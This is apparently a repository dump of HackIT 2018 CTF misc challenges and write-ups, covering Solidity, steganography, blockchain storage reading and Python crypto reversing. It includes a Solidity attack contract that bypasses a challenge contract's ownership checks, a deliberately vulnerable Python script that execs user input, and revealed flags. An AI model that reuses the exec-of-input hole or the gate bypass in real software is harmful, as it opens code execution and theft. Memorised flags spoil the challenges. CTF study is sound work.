├── README.md ├── misc ├── Bulwarck │ ├── README.md │ ├── bulwarck.sol │ └── solution │ │ └── solution.sol ├── Get Going │ ├── README.md │ ├── index.html │ └── solution │ │ └── README.md ├── Inves2gate │ ├── README.md │ ├── challenge-misc01.png │ └── solution │ │ └── README.md ├── PyCry │ ├── README.md │ ├── decrypt.py │ └── encrypt.py ├── Smartpher │ ├── README.md │ ├── message.txt │ ├── smartpher.bytecode │ └── solution │ │ ├── README.md │ │ ├── rotcustom.sol │ │ ├── smartpher.abi │ │ └── solve.py └── TrapOSaur │ ├── README.md │ ├── misc03.pyc │ └── solution │ └── README.md ├── pwn ├── A Heap Interface │ ├── README.md │ ├── exploit.py │ └── heap_interface ├── Army │ ├── README.md │ ├── army │ └── exploit_army.py ├── Bank reimplemented │ ├── README.md │ ├── chall2-bank │ └── exploit_bank.py ├── HashMan │ ├── README.md │ ├── exploit.py │ └── hash_man └── KAMIKAZE │ ├── README.md │ ├── kamikaze │ └── poc.py └── web ├── BabyPeeHPee ├── README.md ├── auth.id0 ├── auth.id1 ├── auth.id2 ├── auth.nam ├── auth.so ├── auth.til ├── flag.php └── index.php ├── PeeHPee2 ├── README.md └── index.php ├── Republic_of_Gayming ├── README.md ├── app.js └── run.sh └── RuAdmin ├── .gitignore ├── Gemfile ├── README.md ├── Rakefile ├── app ├── assets │ ├── config │ │ └── manifest.js │ ├── images │ │ └── .keep │ ├── javascripts │ │ ├── application.js │ │ ├── cable.js │ │ ├── channels │ │ │ └── .keep │ │ ├── resumes.coffee │ │ ├── sessions.coffee │ │ └── users.coffee │ └── stylesheets │ │ ├── application.css │ │ ├── resumes.scss │ │ ├── sessions.scss │ │ └── users.scss ├── channels │ └── application_cable │ │ ├── channel.rb │ │ └── connection.rb ├── controllers │ ├── application_controller.rb │ ├── concerns │ │ └── .keep │ ├── home_controller.rb │ ├── resumes_controller.rb │ └── sessions_controller.rb ├── helpers │ ├── application_helper.rb │ ├── resumes_helper.rb │ ├── sessions_helper.rb │ └── users_helper.rb ├── jobs │ └── application_job.rb ├── mailers │ └── application_mailer.rb ├── 
models │ ├── application_record.rb │ ├── concerns │ │ └── .keep │ ├── resume.rb │ └── user.rb ├── uploaders │ └── attachment_uploader.rb └── views │ ├── home │ └── index.html.erb │ ├── layouts │ ├── application.html.erb │ ├── mailer.html.erb │ └── mailer.text.erb │ ├── resumes │ ├── create.html.erb │ ├── destroy.html.erb │ ├── index.html.erb │ └── new.html.erb │ └── sessions │ ├── admin.html.erb │ └── new.html.erb ├── bin ├── bundle ├── rails ├── rake ├── setup ├── spring └── update ├── config.ru ├── config ├── application.rb ├── boot.rb ├── cable.yml ├── database.yml ├── environment.rb ├── environments │ ├── development.rb │ ├── production.rb │ └── test.rb ├── initializers │ ├── application_controller_renderer.rb │ ├── assets.rb │ ├── backtrace_silencers.rb │ ├── cookies_serializer.rb │ ├── filter_parameter_logging.rb │ ├── inflections.rb │ ├── mime_types.rb │ ├── new_framework_defaults.rb │ ├── session_store.rb │ └── wrap_parameters.rb ├── locales │ └── en.yml ├── puma.rb ├── routes.rb ├── secrets.yml └── spring.rb ├── db ├── migrate │ ├── 20180822104110_create_users.rb │ └── 20180822113826_create_resumes.rb ├── schema.rb └── seeds.rb ├── fl4g_is_h3re └── flag.txt ├── lib ├── assets │ └── .keep └── tasks │ └── .keep ├── log └── .keep ├── public ├── 404.html ├── 422.html ├── 500.html ├── apple-touch-icon-precomposed.png ├── apple-touch-icon.png ├── favicon.ico ├── public │ └── uploads │ │ └── resumes │ │ └── hax.c └── robots.txt ├── test ├── controllers │ ├── .keep │ ├── resumes_controller_test.rb │ ├── sessions_controller_test.rb │ └── users_controller_test.rb ├── fixtures │ ├── .keep │ ├── files │ │ └── .keep │ ├── resumes.yml │ └── users.yml ├── helpers │ └── .keep ├── integration │ └── .keep ├── mailers │ └── .keep ├── models │ ├── .keep │ ├── resume_test.rb │ └── user_test.rb └── test_helper.rb ├── tmp └── .keep └── vendor └── assets ├── javascripts └── .keep └── stylesheets └── .keep /README.md: 
-------------------------------------------------------------------------------- 1 | # HackIT2018 Writeups 2 | -------------------------------------------------------------------------------- /misc/Bulwarck/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/misc/Bulwarck/README.md -------------------------------------------------------------------------------- /misc/Bulwarck/bulwarck.sol: -------------------------------------------------------------------------------- 1 | pragma solidity ^0.4.18; 2 | 3 | contract Bulwarck{ 4 | uint points; 5 | address public owner; 6 | string public x; 7 | string public y; 8 | 9 | function Bulwarck(string _x, string _y) 10 | { 11 | owner = msg.sender; 12 | x = _x; 13 | y = _y; 14 | } 15 | 16 | function blooper(address addr) private returns(bool) 17 | { 18 | uint x; 19 | assembly { x := extcodesize(caller) } 20 | return x == 0; 21 | } 22 | 23 | function check(string a, string b) private returns(bool){ 24 | if(keccak256(x)==keccak256(a) || keccak256(y)==keccak256(b)){ 25 | return false; 26 | }else{ 27 | if( keccak256(x,y) == keccak256(a,b)){ 28 | return true; 29 | }else{ 30 | return false; 31 | } 32 | } 33 | } 34 | 35 | function jumpOver(bytes8 key, string x, string y) 36 | { 37 | require(msg.sender != tx.origin); 38 | require(blooper(msg.sender)); 39 | require(uint32(key) != uint64(key)); 40 | require(uint32(key) == uint16(tx.origin)); 41 | require(check(x,y)); 42 | 43 | owner = tx.origin; 44 | } 45 | } -------------------------------------------------------------------------------- /misc/Bulwarck/solution/solution.sol: -------------------------------------------------------------------------------- 1 | pragma solidity ^0.4.18; 2 | 3 | contract Bulwarck{ 4 | uint points; 5 | address public owner; 6 | string public x; 7 | string public y; 8 | 9 | function Bulwarck(string _x, string _y) 10 | { 11 | 
owner = msg.sender; 12 | x = _x; 13 | y = _y; 14 | } 15 | 16 | function blooper(address addr) private returns(bool) 17 | { 18 | uint x; 19 | assembly { x := extcodesize(caller) } 20 | return x == 0; 21 | } 22 | 23 | function check(string a, string b) private returns(bool){ 24 | if(keccak256(x)==keccak256(a) || keccak256(y)==keccak256(b)){ 25 | return false; 26 | }else{ 27 | if( keccak256(x,y) == keccak256(a,b)){ 28 | return true; 29 | }else{ 30 | return false; 31 | } 32 | } 33 | } 34 | 35 | function jumpOver(bytes8 key, string x, string y) 36 | { 37 | require(msg.sender != tx.origin); 38 | require(blooper(msg.sender)); 39 | require(uint32(key) != uint64(key)); 40 | require(uint32(key) == uint16(tx.origin)); 41 | require(check(x,y)); 42 | 43 | owner = tx.origin; 44 | } 45 | } 46 | 47 | contract Hack_Bulwarck { 48 | 49 | address public target = address; // Replace it 50 | bytes8 public _gateKey = bytes8(tx.origin) & 0xFFFFFFFF0000FFFF; 51 | string x="listen to man"; 52 | string y="yspeak to few"; 53 | constructor() 54 | { 55 | Bulwarck b = Bulwarck(target); 56 | b.jumpOver(_gateKey,x,y); 57 | } 58 | } -------------------------------------------------------------------------------- /misc/Get Going/README.md: -------------------------------------------------------------------------------- 1 | # Get Going 2 | -------------------------------------------------------------------------------- /misc/Get Going/index.html: -------------------------------------------------------------------------------- 1 | W​​​​‏​‍​​​​‏‌‎​​​​‎‏‍​​​​‏​‎​​​​‏‏‎​​​​‏‎‏​​​​‍​‌​​​​‎‏​​​​​‏​‎​​​​‏‍‏​​​​‍​‌​​​​‍​‌​​​​‍‌​​​​​‎‏​​​​​‏​‏​​​​‍​‍​​​​‎‏‏​​​​‏‌‍​​​​‍​‌​​​​‏‍‏​​​​‏‏‍​​​​‎‏​​​​​‏‎‏​​​​‌‏‏​​​​‏‎‌​​​​‏​‏​​​​‎‏​​​​​‏‎‍​​​​‏‍​​​​​‌‏‏​​​​‎‏‏​​​​‌‏‎​​​​‏​​​​​​‍​‌​​​‌​​​elcome to the HackIT 2018 CTF, flag is somewhere here. 
¯_(ツ)_/¯ 2 | -------------------------------------------------------------------------------- /misc/Get Going/solution/README.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | This technique is called 'Zero-Width Steganography', which has not been covered in any CTFs. There is a library for decoding it, https://github.com/offdev/zwsp-steg-js, or it can be decoded manually. 4 | There is nothing to guess: the intention is that players open the console and look at the text, which appears to be plain ASCII but also contains zero-width Unicode characters. Those characters render as nothing, so they only show up when the raw code points or bytes are inspected. 5 | 6 | flag{w3_gr337_h4ck3rz_w1th_un1c0d3} 7 | -------------------------------------------------------------------------------- /misc/Inves2gate/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/misc/Inves2gate/README.md -------------------------------------------------------------------------------- /misc/Inves2gate/challenge-misc01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/misc/Inves2gate/challenge-misc01.png -------------------------------------------------------------------------------- /misc/Inves2gate/solution/README.md: -------------------------------------------------------------------------------- 1 | Part 1: https://ropsten.etherscan.io/tx/0xb61227a91466026ea2f2670bd7725ac00bd7eb198ed71799ecadb6de3647f91e 2 | (flag{5cann1ng_) 3 | 4 | Part 2: https://ropsten.etherscan.io/tx/0xc02fc19b9c2587af1d1aab6aef9093f4b5fca6a0731e373ab4b584bb15a0170e 5 | (wh013_bl0ckch41n_4) 6 | 7 | Part 3: https://ropsten.etherscan.io/tx/0x1bc37a84ae691623c4043457fd3084044354ee656d349213fd63e5da1450ac9e 8 | The contract 0xb4c5ef28a38ffbd1095cc8d1ba947fb0e9a61e4a has storage which needs to be read out (contract storage is publicly readable on-chain, so nothing kept there is secret): 9 | 
web3.eth.getStorageAt('0xb4c5ef28a38ffbd1095cc8d1ba947fb0e9a61e4a', 1, function(x, y) {alert(web3.toAscii(y))}); 10 | (ctf_fl4g_i5_4_skill) 11 | 12 | Part 4: https://ropsten.etherscan.io/tx/0xd4e690ebfeabc1d61fabc2eda20df666633d9caf466f3e0dafdcc5616035df52 13 | https://ropsten.etherscan.io/address/0x0ea92008f4ccc6295e99908e35469fe9ca63787d 14 | web3.eth.getStorageAt('0x0ea92008f4ccc6295e99908e35469fe9ca63787d', 0, function(x, y) {alert(web3.toAscii(y))}); 15 | (_to_nuture}) 16 | 17 | overall : flag{5cann1ng_wh013_bl0ckch41n_4ctf_fl4g_i5_4_skill_to_nuture} -------------------------------------------------------------------------------- /misc/PyCry/README.md: -------------------------------------------------------------------------------- 1 | This challenge is a Python black box in which the second user input supplied is executed directly (it is passed to exec). The script drops privileges to a regular user with no read privileges and is chrooted, so that players cannot tamper with ENV variables etc. (in the published encrypt.py the chroot and setres*id calls are commented out). 2 | The idea is basically to dump all globals; you will then notice the function hint, which states the goal of the challenge explicitly: use dis to reverse the bytecode of each encryption function. 3 | After rebuilding the original encryption routine, it becomes a trivial crypto problem. 
4 | Note: for decryption see decrypt.py 5 | -------------------------------------------------------------------------------- /misc/PyCry/decrypt.py: -------------------------------------------------------------------------------- 1 | import string,random 2 | 3 | def func3d(encryped, key): 4 | msg = [] 5 | for i, c in enumerate(encryped): 6 | key_c = ord(key[i % len(key)]) 7 | enc_c = ord(c) 8 | msg.append(chr((enc_c - key_c) % 127)) 9 | return ''.join(msg) 10 | 11 | 12 | def func2d(d): 13 | try: 14 | e = d[::-1] 15 | k = int(e[:4], 16) ^ 0xA9F ^ 0xE77E 16 | t = e[4:] 17 | f = "" 18 | n = 0 19 | for i in range(0, len(t), 6): 20 | n += 1 21 | c = (n * n) ^ 0x3E 22 | f += chr(int(str(int(t[i:i+6], 16)), 8) ^ (k ^ 0xAFE43 ^ 0x399AA3 ^ c)) 23 | return f 24 | except: 25 | return -1 26 | 27 | def func4d(str): 28 | dec = funcwtf(-1337) 29 | return dec(str) 30 | 31 | def funcwtf(n): 32 | if n > 0: 33 | n = n % 20 34 | else : 35 | n = -((-n) % 20) 36 | lc = string.ascii_lowercase 37 | uc = string.ascii_uppercase 38 | trans = string.maketrans(lc + uc, 39 | lc[n:] + lc[:n] + uc[n:] + uc[:n]) 40 | return lambda s: string.translate(s, trans) 41 | 42 | 43 | def func1d(str1, str2): 44 | tmp = "" 45 | str1 = str1[::-1] 46 | for i in range(len(str1)): 47 | if i%2 == 0 : 48 | tmp += chr((ord(str1[i]) - 4)^ord(str2[i])) 49 | else: 50 | tmp += chr((ord(str1[i]) + 2)^ord(str2[i])) 51 | return tmp 52 | 53 | 54 | 55 | print func1d(func3d(func4d(func2d('0A3BFDA6EBFD5CEBFD1ADBFDBEDBFD1DFBFDF10CFD51FBFD51FBFDBEEBFDB3ABFD3DABFD2DABFD589BFDD79BFD9E9BFD10ABFDDFBBFDAFBBFDD4CBFD77CBFD42BBFD91BBFDC2BBFDB4BBFDE7BBFDB6BBFDF0BBFD2ABBFD22BBFD39BBFDE2BBFDB1CE')),'looooool'),'a6105c0a611b41b08f1209506350279e') 56 | -------------------------------------------------------------------------------- /misc/PyCry/encrypt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os 3 | import random,string 4 | 5 | #os.chroot('/home/chal/pychal') 6 
| #os.setresgid(1003,1003,1003) 7 | #os.setresuid(1003,1003,1003) 8 | def func1e(str1, str2): 9 | tmp = "" 10 | for i in range(len(str1)): 11 | if i%2 == 0 : 12 | tmp += chr((ord(str1[i])^ord(str2[i])) + 4) 13 | else: 14 | tmp += chr((ord(str1[i])^ord(str2[i])) - 2) 15 | return tmp[::-1] 16 | 17 | 18 | 19 | def func2e(d): 20 | try: 21 | k = random.randint(1, 1024) 22 | n = 0 23 | f = "" 24 | for i in range(len(d)): 25 | n += 1 26 | c = (n * n) ^ 0x3E 27 | f += ("00000" + hex(int(oct(ord(d[i]) ^ (k ^ 0xAFE43 ^ 0x399AA3 ^ c))))[2:])[-6:] 28 | f = (("000" + hex(k ^ 0xA9F ^ 0xE77E)[2:])[-4:] + f)[::-1].upper() 29 | return f 30 | except: 31 | return -1 32 | 33 | 34 | 35 | def func3e(msg, key): 36 | encryped = [] 37 | for i, c in enumerate(msg): 38 | key_c = ord(key[i % len(key)]) 39 | msg_c = ord(c) 40 | encryped.append(chr((msg_c + key_c) % 127)) 41 | return ''.join(encryped) 42 | 43 | 44 | 45 | def funcwtf(n): 46 | if n > 0: 47 | n = n % 20 48 | else : 49 | n = -((-n) % 20) 50 | lc = string.ascii_lowercase 51 | uc = string.ascii_uppercase 52 | trans = string.maketrans(lc + uc, 53 | lc[n:] + lc[:n] + uc[n:] + uc[:n]) 54 | return lambda s: string.translate(s, trans) 55 | 56 | 57 | def func4e(str): 58 | enc = funcwtf(1337) 59 | return enc(str) 60 | 61 | 62 | def hint(): 63 | hint = "The flag was encrypted using func2e(func4e(func3e(func1e('flag{redacted}','a6105c0a611b41b08f1209506350279e'),'looooool')))" 64 | hint += "\nI think the output was : 0A3BFDA6EBFD5CEBFD1ADBFDBEDBFD1DFBFDF10CFD51FBFD51FBFDBEEBFDB3ABFD3DABFD2DABFD589BFDD79BFD9E9BFD10ABFDDFBBFDAFBBFDD4CBFD77CBFD42BBFD91BBFDC2BBFDB4BBFDE7BBFDB6BBFDF0BBFD2ABBFD22BBFD39BBFDE2BBFDB1CE" 65 | hint += "\nYou guessed right, your goal is to retrieve the flag using your python, reversing and crypto skills" 66 | hint += "\nGood luck!" 
67 | print hint 68 | 69 | def drunkenc(): 70 | encrypted = func2e(func4e(func3e(func1e('flag{redacted}','a6105c0a611b41b08f1209506350279e'),'looooool'))) 71 | 72 | 73 | if __name__ == '__main__': 74 | name = raw_input("hey bro whats ur name ? : ") 75 | print "Nice to meet you %s, do you wanna hack?"%name 76 | exec(raw_input()) 77 | -------------------------------------------------------------------------------- /misc/Smartpher/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/misc/Smartpher/README.md -------------------------------------------------------------------------------- /misc/Smartpher/message.txt: -------------------------------------------------------------------------------- 1 | Hi Wooble hackers, 2 | I wrote a super secure message encryption system to secure our communication so that FeeNetwork couldn't get our secret access to the chamber. 3 | The code to our secret chamber access code is given below which I generated from our system 4 | 5 | tphzqh}v}uivyznwju 6 | 7 | I combined blockchain and crypto to make double sure everything is good. I attach you other file, but I was too lazy to finish it though. 
Also, to access the chamber please decrypt the above access code and wrap with flag{...} 8 | 9 | Thanks, 10 | Wooble Team -------------------------------------------------------------------------------- /misc/Smartpher/smartpher.bytecode: -------------------------------------------------------------------------------- 1 | 608060405260043610610099576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680632981c3ff1461009e57806337c8bea0146101235780638c1da162146101be5780638d64b9a8146102275780638da5cb5b14610309578063c060ac5314610360578063d9c7f48a14610415578063ddc9b178146104f7578063e106fb4b146105d9575b600080fd5b3480156100aa57600080fd5b50610105600480360381019080803590602001908201803590602001908080601f01602080910402602001604051908101604052809392919081815260200183838082843782019150505050505091929192905050506106bb565b60405180826000191660001916815260200191505060405180910390f35b34801561012f57600080fd5b5061018a600480360381019080803590602001908201803590602001908080601f01602080910402602001604051908101604052809392919081815260200183838082843782019150505050505091929192905050506106ea565b60405180826bffffffffffffffffffffffff19166bffffffffffffffffffffffff1916815260200191505060405180910390f35b3480156101ca57600080fd5b50610225600480360381019080803590602001908201803590602001908080601f0160208091040260200160405190810160405280939291908181526020018383808284378201915050505050509192919290505050610adc565b005b34801561023357600080fd5b5061028e600480360381019080803590602001908201803590602001908080601f0160208091040260200160405190810160405280939291908181526020018383808284378201915050505050509192919290505050610b51565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156102ce5780820151818401526020810190506102b3565b50505050905090810190601f1680156102fb5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34801561031557600080fd5b5061031e610ff3565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffff
ffffffffffffffffff16815260200191505060405180910390f35b34801561036c57600080fd5b5061039a60048036038101908080356bffffffffffffffffffffffff19169060200190929190505050611018565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156103da5780820151818401526020810190506103bf565b50505050905090810190601f1680156104075780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34801561042157600080fd5b5061047c600480360381019080803590602001908201803590602001908080601f0160208091040260200160405190810160405280939291908181526020018383808284378201915050505050509192919290505050611220565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156104bc5780820151818401526020810190506104a1565b50505050905090810190601f1680156104e95780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34801561050357600080fd5b5061055e600480360381019080803590602001908201803590602001908080601f0160208091040260200160405190810160405280939291908181526020018383808284378201915050505050509192919290505050611831565b6040518080602001828103825283818151815260200191508051906020019080838360005b8381101561059e578082015181840152602081019050610583565b50505050905090810190601f1680156105cb5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b3480156105e557600080fd5b50610640600480360381019080803590602001908201803590602001908080601f01602080910402602001604051908101604052809392919081815260200183838082843782019150505050505091929192905050506118f9565b6040518080602001828103825283818151815260200191508051906020019080838360005b83811015610680578082015181840152602081019050610665565b50505050905090810190601f1680156106ad5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6000807f576173207665727920626f72656420746f20696d706c656d656e742074686973905080915050919050565b600060e060020a60003504631605782b811461070557600080fd5b5060048035018035602082019150604067ffffffffffffffc0600183011601600982820310600181
146107375761073e565b6040820191505b50776745230100efcdab890098badcfe001032547600c3d2e1f060005b82811015610a685760408186016000376040818503106001811461077e57610785565b6080828603535b5060408303811460018114610799576107a5565b60088502602051176020525b5060405b60808110156108275760408103516038820351186020820351600c83035118187c0100000001000000010000000100000001000000010000000100000001601f60020a8204167ffffffffefffffffefffffffefffffffefffffffefffffffefffffffefffffffe600283021617905080825250600c810190506107a9565b5060805b6101408110156108aa5760808103516070820351186040820351601883035118187c0300000003000000030000000300000003000000030000000300000003601e60020a8204167ffffffffcfffffffcfffffffcfffffffcfffffffcfffffffcfffffffcfffffffc60048302161790508082525060188101905061082b565b508160008060005b6050811015610a3a5760148104600081146108e45760018114610917576002811461093f576003811461097a5761099e565b602860020a8504605060020a860418935083607860020a860416935083602860020a8604189350635a827999925061099e565b605060020a8504607860020a860418935083602860020a8604189350636ed9eba1925061099e565b605060020a8504607860020a860417935083602860020a860416935083605060020a8604607860020a870416179350638f1bbcdc925061099e565b605060020a8504607860020a860418935083602860020a860418935063ca62c1d692505b50601f60bb60020a8504168063ffffffe0609b60020a87041617905080840190508063ffffffff861601905080830190508060e060020a60048402510401905060a060020a8102602860020a8604179450605060020a633fffffff605260020a87041663c0000000603260020a880416170277ffffffff00ffffffff000000000000ffffffff00ffffffff8616179450506001810190506108b2565b5077ffffffff00ffffffff00ffffffff00ffffffff00ffffffff83860116945050505060408101905061075b565b5063ffffffff811667ffffffff00000000600860020a8304166bffffffff0000000000000000601060020a8404166fffffffff000000000000000000000000601860020a85041673ffffffff00000000000000000000000000000000602060020a860416171717179050806000526014600cf35b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1633
73ffffffffffffffffffffffffffffffffffffffff16141515610b3757600080fd5b8060039080519060200190610b4d929190611907565b5050565b6060806000606060008060046003805460018160011615610100020316600290049050141515610b8057600080fd5b610c2360038054600181600116156101000203166002900480601f016020809104026020016040519081016040528092919081815260200182805460018160011615610100020316600290048015610c195780601f10610bee57610100808354040283529160200191610c19565b820191906000526020600020905b815481529060010190602001808311610bfc57829003601f168201915b50505050506118f9565b9450610c2e856106ea565b9350610c3984611018565b925060405180807f346436343735326361646465366561303139373537653039636533373461613181526020017f62646261383164660000000000000000000000000000000000000000000000008152506028019050604051809103902060001916836040518082805190602001908083835b602083101515610cd15780518252602082019150602081019050602083039250610cac565b6001836020036101000a038019825116818451168082178552505050505050905001915050604051809103902060001916141515610d0e57600080fd5b600487511115610fe55760028751039150600390508660028303815181101515610d3457fe5b9060200101517f010000000000000000000000000000000000000000000000000000000000000090047f0100000000000000000000000000000000000000000000000000000000000000028783815181101515610d8d57fe5b9060200101517f010000000000000000000000000000000000000000000000000000000000000090047f0100000000000000000000000000000000000000000000000000000000000000028260008154600181600116156101000203166002900481101515610df857fe5b815460011615610e175790600052602060002090602091828204019190065b9054901a7f01000000000000000000000000000000000000000000000000000000000000000218188783815181101515610e4d57fe5b9060200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a9053508660088303815181101515610e8e57fe5b9060200101517f010000000000000000000000000000000000000000000000000000000000000090047f0100000000000000000000000000000000000000000000000000000000000000028760048403815181101515610eea57fe5b9060200101517f010000000000000000000000
000000000000000000000000000000000000000090047f0100000000000000000000000000000000000000000000000000000000000000028260028154600181600116156101000203166002900481101515610f5557fe5b815460011615610f745790600052602060002090602091828204019190065b9054901a7f01000000000000000000000000000000000000000000000000000000000000000218188760048403815181101515610fad57fe5b9060200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a905350869550610fe9565b6038565b5050505050919050565b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6060806000806000606060146040519080825280601f01601f1916602001820160405280156110565781602001602082028038833980820191505090505b50945060009350600092505b601483101561112c578260080260020a876c01000000000000000000000000900402600102915060007f010000000000000000000000000000000000000000000000000000000000000002827effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614151561111f578185858151811015156110e657fe5b9060200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a90535083806001019450505b8280600101935050611062565b836040519080825280601f01601f19166020018201604052801561115f5781602001602082028038833980820191505090505b509050600092505b8383101561121357848381518110151561117d57fe5b9060200101517f010000000000000000000000000000000000000000000000000000000000000090047f01000000000000000000000000000000000000000000000000000000000000000281848151811015156111d657fe5b9060200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a9053508280600101935050611167565b8095505050505050919050565b6060600060606000600c4314151561123757600080fd5b439250600a60405190808252806020026020018201604052801561126a5781602001602082028038833980820191505090505b5091506002602083015260186040830152600d606083015260116080830152600860a0830152600960c0830152600a60e08301526005610100830152600361012083015260076101408301523073ffffffffffffffffffffffffffffffffffffffff1663ddc9b178866040518263ffffffff167c01000000000000
000000000000000000000000000000000000000000000281526004018080602001828103825283818151815260200191508051906020019080838360005b8381101561133e578082015181840152602081019050611323565b50505050905090810190601f16801561136b5780820380516001836020036101000a031916815260200191505b5092505050600060405180830381600087803b15801561138a57600080fd5b505af115801561139e573d6000803e3d6000fd5b505050506040513d6000823e3d601f19601f8201168201806040525060208110156113c857600080fd5b8101908080516401000000008111156113e057600080fd5b828101905060208101848111156113f657600080fd5b815185600182028301116401000000008211171561141357600080fd5b505092919050505060019080519060200190611430929190611907565b50600160029080546001816001161561010002031660029004611454929190611987565b50600090505b60028054600181600116156101000203166002900490508110156115cf57827f01000000000000000000000000000000000000000000000000000000000000000282600a600384018115156114ab57fe5b068151811015156114b857fe5b906020019060200201517f010000000000000000000000000000000000000000000000000000000000000002600283815460018160011615610100020316600290048110151561150457fe5b8154600116156115235790600052602060002090602091828204019190065b9054901a7f0100000000000000000000000000000000000000000000000000000000000000021818600282815460018160011615610100020316600290048110151561156b57fe5b81546001161561158a5790600052602060002090602091828204019190065b601f036101000a81548160ff021916907f010000000000000000000000000000000000000000000000000000000000000084040217905550808060010191505061145a565b3073ffffffffffffffffffffffffffffffffffffffff16638d64b9a860026040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040180806020018281038252838181546001816001161561010002031660029004815260200191508054600181600116156101000203166002900480156116a15780601f10611676576101008083540402835291602001916116a1565b820191906000526020600020905b81548152906001019060200180831161168457829003601f168201915b505092505050600060405180830381600087803b1580156116c157600080fd5b505af11580156116d5573d60
00803e3d6000fd5b505050506040513d6000823e3d601f19601f8201168201806040525060208110156116ff57600080fd5b81019080805164010000000081111561171757600080fd5b8281019050602081018481111561172d57600080fd5b815185600182028301116401000000008211171561174a57600080fd5b505092919050505060029080519060200190611767929190611a0e565b5060026001908054600181600116156101000203166002900461178b929190611a8e565b5060018054600181600116156101000203166002900480601f0160208091040260200160405190810160405280929190818152602001828054600181600116156101000203166002900480156118225780601f106117f757610100808354040283529160200191611822565b820191906000526020600020905b81548152906001019060200180831161180557829003601f168201915b50505050509350505050919050565b6060600080600084519250600091505b828260ff1610156118ee57848260ff1681518110151561185d57fe5b9060200101517f010000000000000000000000000000000000000000000000000000000000000090047f01000000000000000000000000000000000000000000000000000000000000000290508060001a9050607b8110606d821116156118c85780607a0360600390505b6020811415156118e15760138101600183026020870101535b8180600101925050611841565b849350505050919050565b606060208201519050919050565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f1061194857805160ff1916838001178555611976565b82800160010185558215611976579182015b8281111561197557825182559160200191906001019061195a565b5b5090506119839190611b15565b5090565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f106119c057805485556119fd565b828001600101855582156119fd57600052602060002091601f016020900482015b828111156119fc5782548255916001019190600101906119e1565b5b509050611a0a9190611b15565b5090565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f10611a4f57805160ff1916838001178555611a7d565b82800160010185558215611a7d579182015b82811115611a7c578251825591602001919060010190611a61565b5b509050611a8a9190611b15565b5090565b828054600181600116156101000203166002900490600052602060002090601f01602090048101
9282601f10611ac75780548555611b04565b82800160010185558215611b0457600052602060002091601f016020900482015b82811115611b03578254825591600101919060010190611ae8565b5b509050611b119190611b15565b5090565b611b3791905b80821115611b33576000816000905550600101611b1b565b5090565b905600a165627a7a723058209843f9ca8cd0382bb0618c4af2822bfca226f69ebe755bb5e49fb5483022a1070029 -------------------------------------------------------------------------------- /misc/Smartpher/solution/README.md: -------------------------------------------------------------------------------- 1 | Step 1: Reverse the EVM bytecode file and figure out the encryption function. 2 | 3 | Step 2: Retrieve the SHA-1 hash of the seed and brute-force the seed, given that seed.length == 4 (a 4-character seed leaves a search space small enough to enumerate). 4 | 5 | Step 3: Use solve.py, which implements the decryption routine, to retrieve the half-decrypted output. 6 | 7 | Step 4: Now implement the reverse of the custom ROT-19 encoding that the Solidity code implements. Using an online ROT-7 tool will give the wrong decryption, because the author tweaked the ROT-19 algorithm during the encryption process. 8 | 9 | Step 5: Wrap the retrieved plaintext in flag{...} and submit it to receive points. 10 | 11 | A detailed explanation is in the solve.py file. 
12 | 13 | flag{patiencepaaysineth} -------------------------------------------------------------------------------- /misc/Smartpher/solution/rotcustom.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.4.24; 2 | 3 | contract rotcustom{ 4 | 5 | function rotDecryptionCustom(string text) view public returns(string) { 6 | uint256 length = bytes(text).length; 7 | for (var i = 0; i < length; i++) { 8 | byte char = bytes(text)[i]; 9 | assembly { 10 | char := byte(0,char) 11 | if and(gt(char,0x60), lt(char,0x6E)) 12 | { char:= add(0x7B, sub(char,0x61)) } 13 | if iszero(eq(char, 0x20)) 14 | {mstore8(add(add(text,0x20), mul(i,1)), sub(char,19))} 15 | } 16 | } 17 | return text; 18 | } 19 | 20 | } -------------------------------------------------------------------------------- /misc/Smartpher/solution/smartpher.abi: -------------------------------------------------------------------------------- 1 | 